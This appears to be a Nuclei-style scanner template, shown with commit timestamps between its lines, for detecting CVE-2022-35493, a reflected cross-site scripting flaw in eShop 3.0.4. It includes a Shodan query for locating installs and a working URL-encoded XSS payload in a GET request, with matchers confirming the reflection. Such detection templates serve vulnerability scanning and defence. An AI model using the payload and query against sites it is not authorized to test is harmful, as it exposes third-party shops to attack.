2022-08-09 19:09:47 +00:00
id : CVE-2022-35493
info :
2022-09-16 19:50:10 +00:00
name : eShop 3.0.4 - Cross-Site Scripting
2022-08-09 19:09:47 +00:00
author : arafatansari
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-09 19:09:47 +00:00
description : |
2022-09-16 19:50:10 +00:00
eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in.
2023-09-06 11:59:08 +00:00
remediation : |
To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
2022-08-09 19:09:47 +00:00
reference :
- https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
2022-08-09 19:18:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-35493
2022-08-16 14:25:34 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-35493
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00133
2023-11-06 12:42:20 +00:00
epss-percentile : 0.48183
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:*
2022-08-09 19:09:47 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wrteam
product : eshop_-_ecommerce_\/_store_website
2023-09-06 11:59:08 +00:00
shodan-query : http.html:"eShop - Multipurpose Ecommerce"
2022-08-09 19:18:12 +00:00
tags : cve,cve2022,eshop,xss
2022-08-09 19:09:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-09 19:09:47 +00:00
- method : GET
path :
2022-08-09 19:18:12 +00:00
- '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
2022-08-09 19:09:47 +00:00
matchers-condition : and
matchers :
2022-08-09 19:18:12 +00:00
- type : word
words :
- 'Search Result for \"><img src=x onerror=alert(document.domain)>'
2022-08-09 19:09:47 +00:00
- type : word
2022-08-09 19:18:12 +00:00
part : header
2022-08-09 19:09:47 +00:00
words :
2022-08-09 19:18:12 +00:00
- text/html
- type : status
status :
- 200
2023-11-06 13:16:29 +00:00
# digest: 4b0a00483046022100fe668be5a3df5c6e00583bdafeb1d4f061acc872cb0745d33ce141d8b62c78fe022100c02bf6b153df3e2ca88db1dfb7ab0561c9fe09b7ebe05d872201eabc0c6871c1:922c64590222798bb761d5b6d8e72950